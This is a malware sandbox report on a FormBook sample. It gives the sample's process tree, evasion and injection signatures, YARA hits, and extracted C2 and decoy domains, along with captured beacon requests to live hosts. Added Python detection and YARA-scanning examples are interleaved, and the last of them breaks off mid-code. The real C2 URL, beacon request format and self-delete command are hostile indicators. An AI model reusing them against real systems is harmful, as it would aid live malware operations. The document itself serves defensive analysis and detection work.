Windows Analysis Report
SecuriteInfo.com.Variant.Jaik.72878.10638.10974

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Jaik.72878.10638.10974 (renamed file extension from 10974 to exe)
Analysis ID: 626276
MD5: 69250f55fbfe48822c838b4eeaf33a0a
SHA1: 3e4e1dd9dbeb98ec354f7a03d455a0a38ccea4e5
SHA256: 752d0155c769033832d6845eabba29bce2b9d0eedff734b31a49c879ed08ff72
Tags: exe

Detection

Family: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

  • System is w10x64
  • SecuriteInfo.com.Variant.Jaik.72878.10638.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe" MD5: 69250F55FBFE48822C838B4EEAF33A0A)
    • fdvucso.exe (PID: 6992 cmdline: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp MD5: 8CA00DF697FFA200C6CA558754C49F37)
      • fdvucso.exe (PID: 7008 cmdline: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp MD5: 8CA00DF697FFA200C6CA558754C49F37)
        • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmd.exe (PID: 6324 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cmd.exe (PID: 2700 cmdline: /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
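The tree above ends with a 32-bit cmd.exe (SysWOW64 on a w10x64 host), parented by explorer.exe, deleting the dropped fdvucso.exe from the user's Temp folder. That self-delete is one of the few points in the chain where the activity shows up as a plain process-creation event rather than in-memory injection. The following detection logic is an added example and not part of the Joe Sandbox report: it runs over constructed process-creation records modelled on the PIDs and command lines in the tree, correlates a `cmd.exe /c del` with an executable that was itself seen running from `%LOCALAPPDATA%\Temp`, and walks the parent chain for context. The explorer.exe record is given a placeholder parent PID because the report's tree places it under PID 7008 as the injection target, not because fdvucso.exe created it.

```python
import re

# Constructed process-creation events modelled on the report's process tree (PIDs and
# command lines from the report; the explorer.exe parent PID is a placeholder, see lead-in).
EVENTS = [
    {"pid": 6960, "ppid": 1, "image": r"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe",
     "cmdline": r'"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe"'},
    {"pid": 6992, "ppid": 6960, "image": r"C:\Users\user\AppData\Local\Temp\fdvucso.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp"},
    {"pid": 7008, "ppid": 6992, "image": r"C:\Users\user\AppData\Local\Temp\fdvucso.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp"},
    {"pid": 684, "ppid": 0, "image": r"C:\Windows\Explorer.EXE", "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 6324, "ppid": 684, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r"C:\Windows\SysWOW64\cmd.exe"},
    {"pid": 2700, "ppid": 6324, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"'},
    {"pid": 3376, "ppid": 2700, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    # Benign control (constructed): a user shell deleting a text file must not fire.
    {"pid": 9001, "ppid": 684, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c del "C:\Users\user\notes.txt"'},
]

# An executable living directly under <profile>\AppData\Local\Temp.
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.I)
# cmd.exe "/c del <path>.exe", with or without quotes around the path.
DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?\.exe)"?\s*$', re.I)


def ancestry(events, pid):
    """Return the event records from pid up to the root, following ppid links."""
    index = {e["pid"]: e for e in events}
    chain = []
    while pid in index:
        chain.append(index[pid])
        pid = index[pid]["ppid"]
    return chain


def detect(events):
    """Alert when cmd.exe deletes an .exe that was previously observed executing from Temp."""
    ran_from_temp = {e["image"].lower() for e in events if TEMP_EXE_RE.search(e["image"])}
    alerts = []
    for e in events:
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m or m.group(1).lower() not in ran_from_temp:
            continue
        alerts.append({
            "pid": e["pid"],
            "deleted": m.group(1),
            # 32-bit cmd.exe on a 64-bit host is worth recording: a 32-bit injected payload
            # spawns the SysWOW64 copy, an interactive user normally gets System32\cmd.exe.
            "wow64": "\\syswow64\\" in e["image"].lower(),
            "chain": [a["image"] for a in ancestry(events, e["pid"])],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The correlation key is the deleted path matching an image that already executed, which keeps ordinary `del` commands quiet; the WOW64 flag and the explorer.exe ancestor are carried along as triage context rather than used as the trigger.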
{"C2 list": ["www.worklifefirewalls.com/m9y5/"], "decoy": ["cryptocurrenciesmarketcaps.com", "legaslktiy3.xyz", "cardhj.com", "zouoolaa.xyz", "yjy888.com", "modernboatsalesnadservice.xyz", "zeirishiyamasaki.com", "jamesture.com", "wwwcharleys.com", "walletsw.com", "mbbpaymentplan.com", "lume24.com", "steelonsite.com", "digihm.solutions", "desertunicorns.com", "marbepay.com", "vvv678.com", "73154.xyz", "qzbozhijy.com", "daometalaunch.com", "asproclub.com", "jobeta.net", "whusab.xyz", "delivery-074812.xyz", "magicportriat.com", "floridacommercialprinting.com", "jogodobicho.top", "acessesiteonline01.online", "lakrkajz.xyz", "medicalmassageofpalmbeaches.com", "trendylifeco.com", "upliftpropertysolutions.com", "discountbestdeals.com", "antoniolorenzo.com", "etheteroad.com", "atukr.icu", "xinli-ac.com", "hhydlxs.com", "megabandar.xyz", "olyards.com", "likeama.com", "homes.equipment", "rscall.center", "mayonline.online", "trq-advisors.com", "growyourown.center", "citzensinfo.com", "modernerkredit.com", "chitbucket.com", "kookpedal.com", "tatahotsauce.com", "steadywoman.com", "rfpconsultants.xyz", "insurancecentral.info", "appalachianfamilies.com", "boywhocode.xyz", "a-superb-us-retro-clothes.fyi", "meandmsjones.online", "pastoreemilio.com", "emprendemente.online", "erminelair.com", "doudou-ssr.net", "credit.cool", "dgengcase.com"]}
Yara matches in memory dumps

Source | Rule | Description | Author | Strings

Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(28 further memory-dump entries not shown)

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings

Source: 1.2.fdvucso.exe.a70000.0.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 2.0.fdvucso.exe.400000.6.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(22 further unpacked-PE entries not shown)

No Sigma rule has matched
No Snort rule has matched
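The string listings above are worth reading rather than just counting: `$sequence_0` (`03 C8 0F 31 2B C1 89 45 FC`) decodes as `add ecx, eax; rdtsc; sub eax, ecx; mov [ebp-4], eax`, which is the timing measurement behind the "Tries to detect virtualization through RDTSC time measurements" signature, and each of the JPCERT/CC strings is a five-byte `push imm32`, whose immediates the rule names after the sqlite3 functions the payload looks up. The scanner below is an added example, not code from the report, Joe Security or the rule authors: it takes the hex strings exactly as listed, finds every occurrence in a buffer with plain byte search (so it runs without yara-python), decodes the `push` immediates, flags which sequences contain the `rdtsc` opcode, and renders the same strings back as YARA rule text. The buffer it scans is constructed filler with two of the listed sequences planted at known offsets, and the `N of them` condition in the rendered rule is an assumption, not the original rules' condition.

```python
import re
import struct

# Hex strings copied verbatim from the report's Yara listings; names are the rules' own.
YARA_SIGNATOR_SEQUENCES = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
JPCERT_STRINGS = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}


def hex_to_bytes(pattern: str) -> bytes:
    return bytes.fromhex(pattern.replace(" ", ""))


def scan(buf: bytes, strings: dict) -> dict:
    """Map each string name to every offset at which it occurs in buf (like YARA's string hits)."""
    hits = {}
    for name, pattern in strings.items():
        needle = re.escape(hex_to_bytes(pattern))
        offsets = [m.start() for m in re.finditer(needle, buf)]
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(pattern: str):
    """Decode a 5-byte 'push imm32' (opcode 0x68) into its little-endian constant, else None."""
    b = hex_to_bytes(pattern)
    if len(b) == 5 and b[0] == 0x68:
        return struct.unpack("<I", b[1:])[0]
    return None


def contains_rdtsc(pattern: str) -> bool:
    """True if the byte sequence contains the two-byte RDTSC opcode 0F 31."""
    return b"\x0f\x31" in hex_to_bytes(pattern)


def to_yara(rule_name: str, strings: dict, min_strings: int) -> str:
    """Render the listed hex strings as YARA rule text; the condition is an assumed 'N of them'."""
    lines = [f"rule {rule_name} {{", "    strings:"]
    for name, pattern in strings.items():
        lines.append(f"        {name} = {{ {pattern} }}")
    lines += ["    condition:", f"        {min_strings} of them", "}"]
    return "\n".join(lines)


# Constructed scan target: NOP filler with $sequence_0 planted at 0x10 and $sqlite3step at 0x30.
_buf = bytearray(b"\x90" * 0x40)
_buf[0x10:0x19] = hex_to_bytes(YARA_SIGNATOR_SEQUENCES["$sequence_0"])
_buf[0x30:0x35] = hex_to_bytes(JPCERT_STRINGS["$sqlite3step"])
SAMPLE = bytes(_buf)

if __name__ == "__main__":
    print(scan(SAMPLE, {**YARA_SIGNATOR_SEQUENCES, **JPCERT_STRINGS}))
    for name, pat in JPCERT_STRINGS.items():
        print(f"{name}: push 0x{push_imm32(pat):08X}")
    print([n for n, p in YARA_SIGNATOR_SEQUENCES.items() if contains_rdtsc(p)])
    print(to_yara("Formbook_1", YARA_SIGNATOR_SEQUENCES, 7))
```

Against a real dump you would feed the `.sdmp` or `.unpack` file's bytes to `scan()` and expect the same offsets the report prints (0x9908 and 0x9b82 for `$sequence_0`, for instance); the decoded immediates are stable across FormBook builds only as long as the payload keeps the same hashing of its API names, which the report does not state, so treat them as this family's fingerprint rather than a guarantee.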

          AV Detection

Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as listed above)
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Virustotal: Detection: 41%
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | ReversingLabs: Detection: 43%
Source: Yara match | File source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Joe Sandbox ML: detected
Source: 2.0.fdvucso.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.fdvucso.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.fdvucso.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.fdvucso.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.fdvucso.exe.a70000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb | source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe, 00000000.00000002.454080692.0000000000789000.00000004.00000001.01000000.00000003.sdmp, fdvucso.exe, 00000001.00000000.430396179.000000000119E000.00000002.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000001.00000002.440272687.000000000119E000.00000002.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000002.00000000.433738219.000000000119E000.00000002.00000001.01000000.00000004.sdmp, cmd.exe, 0000000D.00000002.695116331.000000000335F000.00000004.10000000.00040000.00000000.sdmp, nsmCEB5.tmp.0.dr, fdvucso.exe.0.dr
Source: Binary string: wntdll.pdbUGP | source: fdvucso.exe, 00000001.00000003.438551302.000000001A540000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000001.00000003.434608426.000000001A6D0000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515050798.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.441575692.0000000001354000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.439819748.00000000011B4000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515766558.000000000160F000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694158511.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.515945671.0000000000BC9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.514406903.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694414486.0000000000E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP | source: fdvucso.exe, 00000002.00000002.516194872.0000000003200000.00000040.10000000.00040000.00000000.sdmp, fdvucso.exe, 00000002.00000003.513191387.0000000001041000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694963571.0000000001100000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000D.00000000.513997856.0000000001100000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: fdvucso.exe, 00000001.00000003.438551302.000000001A540000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000001.00000003.434608426.000000001A6D0000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515050798.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.441575692.0000000001354000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.439819748.00000000011B4000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515766558.000000000160F000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694158511.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.515945671.0000000000BC9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.514406903.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694414486.0000000000E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdb | source: fdvucso.exe, 00000002.00000002.516194872.0000000003200000.00000040.10000000.00040000.00000000.sdmp, fdvucso.exe, 00000002.00000003.513191387.0000000001041000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694963571.0000000001100000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000D.00000000.513997856.0000000001100000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_00405D7A CloseHandle, GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_004069A4 FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_0040290B FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 4x nop then pop edi

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 170.75.150.177 80
Source: C:\Windows\explorer.exe | Domain query: www.lume24.com
Source: C:\Windows\explorer.exe | Domain query: www.cryptocurrenciesmarketcaps.com
Source: C:\Windows\explorer.exe | Network Connect: 35.186.238.101 80
Source: C:\Windows\explorer.exe | Domain query: www.qzbozhijy.com
Source: Malware configuration extractor | URLs: www.worklifefirewalls.com/m9y5/
Source: Joe Sandbox View | ASN Name: QUICKPACKETUS
Source: global traffic | HTTP traffic detected:
    GET /m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4 HTTP/1.1
    Host: www.qzbozhijy.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven null bytes, nothing printable)
Source: global traffic | HTTP traffic detected:
    GET /m9y5/?GDHDO=nj3oxEIT1zdIdiXK9EykkBiMkkzJg0Of7VGGA4YdAoGVUT4DfIqyC+XPG7GpV3gppNhE&2d0tk4=7nxxAXLHM4 HTTP/1.1
    Host: www.cryptocurrenciesmarketcaps.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven null bytes, nothing printable)
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 13 May 2022 17:45:29 GMT
    Content-Type: text/html
    Content-Length: 291
    ETag: "627e693c-123"
    Via: 1.1 google
    Connection: close
    Data Raw: 291-byte HTML body (hex omitted; shown decoded below)
    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: cmd.exe, 0000000D.00000002.695248264.000000000384F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: cmd.exe, 0000000D.00000002.695248264.000000000384F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
Source: unknown | DNS traffic detected: queries for: www.qzbozhijy.com
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_0040580F GetDlgItem, GetDlgItem, GetDlgItem, GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, ShowWindow, ShowWindow, GetDlgItem, SendMessageW, SendMessageW, SendMessageW, GetDlgItem, CreateThread, CloseHandle, ShowWindow, ShowWindow, ShowWindow, ShowWindow, SendMessageW, CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu, SendMessageW, OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, SendMessageW, GlobalUnlock, SetClipboardData, CloseClipboard
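The two beacons captured above both go to hosts from the config's decoy list (www.qzbozhijy.com and www.cryptocurrenciesmarketcaps.com), not to the configured C2 www.worklifefirewalls.com, yet they carry the C2's URI path /m9y5/, the same two-parameter query shape, an empty seven-null-byte body and no User-Agent. The practical consequence is that a block list built from the "C2 list" field alone sees none of this traffic; the path and request shape are the stable part. The checker below is an added example and not part of the report or of any Joe Sandbox tooling: it loads the configuration as extracted (decoy list shortened to four of the 64 entries), derives C2 hosts, C2 paths and decoy hosts from it, and classifies constructed request records modelled on the two captured GETs plus one benign control. The parameter-shape regex is an observation of this sample's requests, not a documented FormBook format.

```python
import json
import re
from urllib.parse import urlsplit

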